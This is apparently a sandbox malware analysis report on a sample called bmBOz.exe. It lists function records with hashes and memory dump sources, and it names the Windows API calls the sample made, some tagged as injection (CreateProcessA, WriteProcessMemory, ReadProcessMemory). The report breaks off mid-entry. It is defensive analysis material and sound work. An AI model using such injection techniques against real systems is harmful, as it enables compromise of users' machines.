Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1be1cf8e597d025896ebfa43dbf622a3448d5d5bed369e7e4a4b832738fea771
Instruction ID: fedfcec3e9fff611a857d83741065460c1babcff9f507fc35d538a41311151dc
Opcode Fuzzy Hash: 1be1cf8e597d025896ebfa43dbf622a3448d5d5bed369e7e4a4b832738fea771
Instruction Fuzzy Hash: E2115B39B002148FC704EB78D168B6D7BF2AF8C215B5584A8E50ADB364DF30EC52DB41

Function 01510448 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6315162f4f9bfa46fc5de4d069381cec704911a44e65d72b835e6343954a95a
Instruction ID: 7e7f5831ae77417408b545eb8938efd7325989c6bc39a8f4fe322ac054d7ed36
Opcode Fuzzy Hash: a6315162f4f9bfa46fc5de4d069381cec704911a44e65d72b835e6343954a95a
Instruction Fuzzy Hash: 5901D471A04344AFDB16DF69D8189AEBFB6FFC6210704C0AAE804CB266DA309C01CB90

Function 015ED819 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3909518516.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15ed000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0afae5f2ecb08681e14673a454936353de4a55f741ec23daf9c30041c1cb706
Instruction ID: 303bd8534bad532466fa0f4f267a0f89ce2f9a9d04568654f70b0cce0ff9a7d7
Opcode Fuzzy Hash: e0afae5f2ecb08681e14673a454936353de4a55f741ec23daf9c30041c1cb706
Instruction Fuzzy Hash: 6E01A771908340AAE7245AA9CC8876ABFE8FF41660F18855AED4D5E297C2759840CAB2

Function 01513EF4 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 151abc51e1c23e38096114eebff80f75174d1525bc4105601a488eef32490fff
Instruction ID: bada2530d0b46f631bbff8bfad7b1d0ad536d017710b9c224ec59c5e3621325c
Opcode Fuzzy Hash: 151abc51e1c23e38096114eebff80f75174d1525bc4105601a488eef32490fff
Instruction Fuzzy Hash: 7E113C70900208DFEB15CF5AC4947DEBEF1BF88360F24C129E928AB2A4C7748985CF90

Function 015142B0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b3e453e15bb0a14aac43d7b74c6d8e7b050ac8018f890083053d9f928ff970e
Instruction ID: 8c39ed439f513ca4b32022affd53dc7db56b3aec6e917372c72535e0f5afa49d
Opcode Fuzzy Hash: 2b3e453e15bb0a14aac43d7b74c6d8e7b050ac8018f890083053d9f928ff970e
Instruction Fuzzy Hash: 2BF0B4B2B002515FD712A67D98946EE27DAFFCA274B150475D00ACF252EB18DC428351

Function 01513F00 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1862f97325c578d09df4a5c6c2590d1e3ab0f7b896d03a0422ba2406982dad5c
Instruction ID: 7d01ec89ec840e7aec848c9d3c432efb3ba272f6bff8db1e1b01eedd22e193da
Opcode Fuzzy Hash: 1862f97325c578d09df4a5c6c2590d1e3ab0f7b896d03a0422ba2406982dad5c
Instruction Fuzzy Hash: 61014C70900208DFEB15CF9AC4987DEBEF1FB48360F24C169E928AB294C7748985CB94

Function 01510E82 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53549b1a9f53c6e5f42e85f6a15f7f4adfe8ae894e5d46b7f5c02df66aefd40d
Instruction ID: 1fd5bcd9fe1ee075a632e6e9f5945dc9e1523012f10c52443404d2624d566d06
Opcode Fuzzy Hash: 53549b1a9f53c6e5f42e85f6a15f7f4adfe8ae894e5d46b7f5c02df66aefd40d
Instruction Fuzzy Hash: 8AF0F631A062689FDF23CFEDE8C589EBB75FB06220F1545B6F504CB192C321D9888755

Function 03129E58 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae87a5ae4687808b8cf4e43e03661da1ae1ceb84ece868ed2666e17e2fc7b99
Instruction ID: aad7787269d47bf5ac9fb2e1c16a58aeaf1d3b358c10e9ac8e98a9059550b1ec
Opcode Fuzzy Hash: 6ae87a5ae4687808b8cf4e43e03661da1ae1ceb84ece868ed2666e17e2fc7b99
Instruction Fuzzy Hash: E801D834A003496FDB15D7B8E4556DCBFA2FB46200B2046A8C0018F1A5EE355E07C742

Function 015ED818 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3909518516.00000000015ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 015ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_15ed000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c680e5f8d0036d387b1aeb5e157a030ee0ae381fb7f87b89a25fb18392fad4a3
Instruction ID: 944b285f96abc78f287d35c1d883f2dbaef34c9a5c46a485afdb87161c6a9e4a
Opcode Fuzzy Hash: c680e5f8d0036d387b1aeb5e157a030ee0ae381fb7f87b89a25fb18392fad4a3
Instruction Fuzzy Hash: DFF0C872404340AEE7248A09CC88B66FFE8EB41734F14C15AED0C5F293C2759840CA71

Function 015142C0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 154f7b3bde7b92f0b05a1eed403aff89e4654d2dda2218b301728e7453c954c8
Instruction ID: 4de622d8ec95a18cde1afd67b6b0d7b3b52d236b52aee239c8d3b48b839fa619
Opcode Fuzzy Hash: 154f7b3bde7b92f0b05a1eed403aff89e4654d2dda2218b301728e7453c954c8
Instruction Fuzzy Hash: AFF0A9317002502F9A25E26EA898ABF66CEFBC92A4B500438E10ECF352DB10EC418391

Function 03129E68 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 844518c87219c305fb7cafb78aa031a39376cd309566e982cb00a332056d6d5e
Instruction ID: 8bb6f4a55c4ef0957174e34d41ba06c3e47b4ab33ccc457fc579a6e42301775b
Opcode Fuzzy Hash: 844518c87219c305fb7cafb78aa031a39376cd309566e982cb00a332056d6d5e
Instruction Fuzzy Hash: D1F01234A00209ABDB44EBB8F55569DBBF6FB44300F204678C4059B258EF316E068791

Function 03120838 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10c0aa5ad15c49059369e770763febb8bcbfdc87cd2b1f04c9aac3c077d3fe27
Instruction ID: c9026ff9b304b7b17096cc2ba89146cb6cae41174b0c9fadf9ffb1e4945fe670
Opcode Fuzzy Hash: 10c0aa5ad15c49059369e770763febb8bcbfdc87cd2b1f04c9aac3c077d3fe27
Instruction Fuzzy Hash: 1BF09234D452A14BEF399274945437A7F1CDB4F210F1909F7EC06CB297D645C8A547A2

Function 015105B8 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a49ab9ea0d1a39e2ed285c245c4b27c4765c0cc2c23923bf3697916dd25f3d0
Instruction ID: 0130b36b9aad92920ac01247a5d746f3ac5375bac79b765ab08feb716d548a5e
Opcode Fuzzy Hash: 2a49ab9ea0d1a39e2ed285c245c4b27c4765c0cc2c23923bf3697916dd25f3d0
Instruction Fuzzy Hash: 9AF027B4A06345EFC702DFA4F4148AD7FF1FF41204B104199D800D7261CA391F14CB11

Function 031287F0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd86d469149dea7346ea57c0e6870f995fc18177d6f768da2cd66e0980896fc0
Instruction ID: c65aed53bcab8882836bc734edfc7a1e5ab46d12f95cd56cf8ee9c347daf396a
Opcode Fuzzy Hash: dd86d469149dea7346ea57c0e6870f995fc18177d6f768da2cd66e0980896fc0
Instruction Fuzzy Hash: 70E072323042645FC381E7BCA8204987BF9EF8F51034300E7E008CF262CA206C0683E4

Function 03129E10 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f8540f6388236aff758650466453eac31680051dc3dee6f90e4e15ef051b55b
Instruction ID: 6ad0c27ea6bda3a9517f3d80a4cef1b06433e29f8c72149de823cdf04ef7fa76
Opcode Fuzzy Hash: 2f8540f6388236aff758650466453eac31680051dc3dee6f90e4e15ef051b55b
Instruction Fuzzy Hash: 4EE0CD349192540FEB35923C4559B553F5CD70F120F5558EAF54DC7243DB05CCB54222

Function 03120848 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a720acd60a161e9e5245de3d2b80ada3c4f38e2a61c1e5f02b9995cdf74797d8
Instruction ID: c59ec930e8bafe86cf33868cb1f77c22804239c23822bec787e075bd9d017b41
Opcode Fuzzy Hash: a720acd60a161e9e5245de3d2b80ada3c4f38e2a61c1e5f02b9995cdf74797d8
Instruction Fuzzy Hash: 78E05B34E0012507FF3C65A8A54437B3A4CD74E310F1405B6ED0AC6285EB55C8E145D2

Function 03128AE8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa7c6d96de7da7884f321a04afb442b236262559c276e88a82607016b686a2a7
Instruction ID: db8a8bed233c1427f178aae85ce3819182cfc8d3f7bfe53656f2ee6ea5a66ac9
Opcode Fuzzy Hash: aa7c6d96de7da7884f321a04afb442b236262559c276e88a82607016b686a2a7
Instruction Fuzzy Hash: C2E0A7B11283780FEB21957898557563F9CDB0F940F1908E6F445CF186E61BE865C652

Function 03128828 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d8ee198e76b8641aa1dcf775f85b539d470e5c5e17660736784856e20dc107b
Instruction ID: b9548ba7ca6ed6ee8167cb68659fd8c2403ac0c27bff117668fc0d2008c7918a
Opcode Fuzzy Hash: 9d8ee198e76b8641aa1dcf775f85b539d470e5c5e17660736784856e20dc107b
Instruction Fuzzy Hash: 98E02B729042A00FDF21C6388855BC5BF24E707240F0948E7DC06CB203E109C55BC221

Function 015105C8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14e305c199928800c6c281150c3496655612d8b791aa54257c98d3ee9b5ce8c6
Instruction ID: 77b2960dd19d8e9404448c5ff396e653ae209154c97ffe48f9c77bee690d14dc
Opcode Fuzzy Hash: 14e305c199928800c6c281150c3496655612d8b791aa54257c98d3ee9b5ce8c6
Instruction Fuzzy Hash: 9AE086B4E01109EFC700EFA8F55495D77F6FB45204F104164D80497310DE352F04DB55

Function 03129E20 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbce61925229ae7714b4e7d12f92c0acc3cb15b3d7e889f55e94c50cbbf55e33
Instruction ID: 237a595efbf1a715931815b438770b0e2fabe392f442ee0d90c5256368c5761a
Opcode Fuzzy Hash: cbce61925229ae7714b4e7d12f92c0acc3cb15b3d7e889f55e94c50cbbf55e33
Instruction Fuzzy Hash: 55D0C9386151280BEB34A66D995AB2A3E9CD74D220F145CA9F90EC6642DF15CCB15522

Function 01511938 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 814d99dbac6e01a529edec3b3597520a859d17b3572256b5b09b291d2b1fbdf2
Instruction ID: 3cae915f021728ce62112cee700c7ddf23556dfbffb44f684477d39d8be6a102
Opcode Fuzzy Hash: 814d99dbac6e01a529edec3b3597520a859d17b3572256b5b09b291d2b1fbdf2
Instruction Fuzzy Hash: E9D0923610121EBB8F01AE85EC41DDB3B2AEF997A0B148015FE141B255C672E971EBE0

Function 03128800 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e20db04a838a67acdda5c77c061b2b30d091726cda427354a704db24fa7067a
Instruction ID: 7f63d37d9ef15043e1fa6e17bc9709da4c02ae4da11094ceea2e638f146558c1
Opcode Fuzzy Hash: 3e20db04a838a67acdda5c77c061b2b30d091726cda427354a704db24fa7067a
Instruction Fuzzy Hash: 4DD012357105349F8648F7ACE4588AD77EDEFDE56139101AAE10DDF360CEA1AC0087D9

Function 03128AF8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dc3d89c4a2bc2013e4f712022713cf5de9cabfd6733097bd22e2349685da5ee
Instruction ID: b74d5a8e83d9a763f5883b5411563e2e0f786c6396334330870d1b2a87d51e4d
Opcode Fuzzy Hash: 2dc3d89c4a2bc2013e4f712022713cf5de9cabfd6733097bd22e2349685da5ee
Instruction Fuzzy Hash: DDC08C3021022807EB209478950A7263A8C930D254F1808A4F81AC7281EA42E8A08482

Function 03128838 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3911223863.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3120000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 226016f737c5e1ee3b296a1ecdc7fabfea700592fab44ccd5286dc148ff6a543
Instruction ID: d6a621939ddfdef7b00e334b91a59effd26ef18c4be808eed49f8845a114f753
Opcode Fuzzy Hash: 226016f737c5e1ee3b296a1ecdc7fabfea700592fab44ccd5286dc148ff6a543
Instruction Fuzzy Hash: CFC08C3170022407EF2091A8A51AB263B4CD308290F5448B5FC0AC2201F605E8A08059

Function 01511B83 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3177a6001d0ee05504040157b9501526a5f201df23b134e064c14976f1eae6f7
Instruction ID: 06db847a13bcd909409e7feaec05355ad744c2f19dcae5c5fc38e6848f2f726b
Opcode Fuzzy Hash: 3177a6001d0ee05504040157b9501526a5f201df23b134e064c14976f1eae6f7
Instruction Fuzzy Hash: 2FD0C970D4061ACFFB328F91D9987EEBBB0FB04315F004999D112AA188DBBD0546CF41

Function 015103E0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 921caa5a3a9e404828e48fbf04fa3591f7cce5a9de69db0f92828e2dfda6ebf1
Instruction ID: 8dd8fd48501064bf7ba1c36608f604ebbaa2d9530d7d5d832c6f4f52184269c4
Opcode Fuzzy Hash: 921caa5a3a9e404828e48fbf04fa3591f7cce5a9de69db0f92828e2dfda6ebf1
Instruction Fuzzy Hash: 87C012708006008BDF159F6881882153AA0FB51318B300B8C91284D1D2C271C547DBC1

Function 01511C75 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.3908853593.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_1510000_bmBOz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 463980128ac36aaffd1af460ac72178f759deaab372dd2e8750c2da9b638f2c7
Instruction ID: e4de2f3f50db4108936148c7530184a19248b184b3052d863f3eaec9d1ec344c
Opcode Fuzzy Hash: 463980128ac36aaffd1af460ac72178f759deaab372dd2e8750c2da9b638f2c7
Instruction Fuzzy Hash: E9C002B04006008ECF19DF55D2485007AA2AB55328B35438C90284E296D776C547DBD1

Analysis Process: bmBOz.exePID: 4428, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	51
Total number of Limit Nodes:	5

Executed Functions

Function 013EDDD8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 013EDE56
GetCurrentThread.KERNEL32 ref: 013EDE93
GetCurrentProcess.KERNEL32 ref: 013EDED0
GetCurrentThreadId.KERNEL32 ref: 013EDF29

Memory Dump Source

Source File: 00000016.00000002.1694131613.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13e0000_bmBOz.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 299ff9707e92cb6c6ee933f9803f9461f4815ba85339170d6b1142943935206e
Instruction ID: 1c136f117e0774a3230f28200f3571203be1f1c9d6e8cae5cd2c9ce35268c79e
Opcode Fuzzy Hash: 299ff9707e92cb6c6ee933f9803f9461f4815ba85339170d6b1142943935206e
Instruction Fuzzy Hash: 495144B0901349CFEB18DFAAD548B9EBBF1FF88308F208459E009AB390D7759944CB65

Function 072AFABE Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072AFCFE

Memory Dump Source

Source File: 00000016.00000002.1727123442.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_72a0000_bmBOz.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 716c2a7917f8dde382a3656baeba3848e13933413bf0f318ce19a63fb5b14cda
Instruction ID: 0fee4b0ded8df47c4eb2e7ec91afea40823ea2dba44bd31a94735beab91cf1f6
Opcode Fuzzy Hash: 716c2a7917f8dde382a3656baeba3848e13933413bf0f318ce19a63fb5b14cda
Instruction Fuzzy Hash: BBA16CB1D1075ADFEB24CF68C950BDDBBB2BF48314F048569D818A7240DB789985CF91

Function 072AFAC8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 072AFCFE

Memory Dump Source

Source File: 00000016.00000002.1727123442.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_72a0000_bmBOz.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 48dd5068df56b5ec25c9bfc1f0b1fa2e175a3bb76831d5f59069ce3fc3ffe84e
Instruction ID: 04edf3dc969f196f7e4846ba7d6ddf29551084d172b80163ca6c242934416fb4
Opcode Fuzzy Hash: 48dd5068df56b5ec25c9bfc1f0b1fa2e175a3bb76831d5f59069ce3fc3ffe84e
Instruction Fuzzy Hash: 24915CB1D1075ADFEB24CF68C940BDDBBB2BF48314F148569D818A7240DB789985CF91

Function 013EBB40 Relevance: 1.7, APIs: 1, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 013EBDA6

Memory Dump Source

Source File: 00000016.00000002.1694131613.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13e0000_bmBOz.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 596ff47642979d3e4d74c1d5e86282ab59734fde9a400e309f2cb5fb86c5141f
Instruction ID: b1ad83ef8fa52e4d54344cd2313522899ae8a426e2b5c3ca1c32f88037f4a861
Opcode Fuzzy Hash: 596ff47642979d3e4d74c1d5e86282ab59734fde9a400e309f2cb5fb86c5141f
Instruction Fuzzy Hash: A5816970A00B558FDB26DF29D0447AABBF5FF88208F00892DD48AD7A94DB35E855CB91

Function 013E590C Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013E59C9

Memory Dump Source

Source File: 00000016.00000002.1694131613.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13e0000_bmBOz.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ad1c5428dbb0d9cf2a333056e912ea717b6b44dd48fee59c9b8702a16bbfb7a3
Instruction ID: 4688231b8579557cb05401ab43bf76d672383b1461525e20b3f8933a4dd920a6
Opcode Fuzzy Hash: ad1c5428dbb0d9cf2a333056e912ea717b6b44dd48fee59c9b8702a16bbfb7a3
Instruction Fuzzy Hash: 4041ED75C00769CFEB24CFA9C884BDDBBF5AB49308F24806AD409AB250DB766946CF50

Function 013E4514 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013E59C9

Memory Dump Source

Source File: 00000016.00000002.1694131613.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13e0000_bmBOz.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f79572532bc2bd478058ba5ffd15023d5d6e8969cb2a8708f8b08d44b8b734b1
Instruction ID: 8bdff0aadaed226987aa4ad82544d0ee18a7e8f884b54b11a0eddc4f28d2a325
Opcode Fuzzy Hash: f79572532bc2bd478058ba5ffd15023d5d6e8969cb2a8708f8b08d44b8b734b1
Instruction Fuzzy Hash: 6041CF75C00769CBEB24DFA9C884B8EBBF5AB49308F20806AD409AB251DB756945CF90

Function 072AF838 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072AF8D0

Memory Dump Source

Source File: 00000016.00000002.1727123442.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_72a0000_bmBOz.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4781daffc788a1d71570c69a0c12ab21ebaf9eebc049f7e3793d0a4519c5d1ac
Instruction ID: e63d19136234724e8641882785f5432f0f3ba420f17114e4b1b7a0ef5ad5c829
Opcode Fuzzy Hash: 4781daffc788a1d71570c69a0c12ab21ebaf9eebc049f7e3793d0a4519c5d1ac
Instruction Fuzzy Hash: 322124B2D1034A9FDB14CFA9C884BDEBBF1BF48310F10882AE959A7240C7789945CB64

Function 072AF840 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072AF8D0

Memory Dump Source

Source File: 00000016.00000002.1727123442.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_72a0000_bmBOz.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6f5ed46ee367ff97f800061ffb6c3d675ebdc47fb1e20e06cc607ee311e93343
Instruction ID: 7504c38aa7b164d5800bdc27d8aa2090cba4306dcb6bc078ae29b336f516d9f6
Opcode Fuzzy Hash: 6f5ed46ee367ff97f800061ffb6c3d675ebdc47fb1e20e06cc607ee311e93343
Instruction Fuzzy Hash: 472127B5D103599FDB14CFA9C984BDEBBF5FF48310F10842AE918A7240C7799940CBA4

Function 072AF928 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072AF9B0

Memory Dump Source

Source File: 00000016.00000002.1727123442.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_72a0000_bmBOz.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
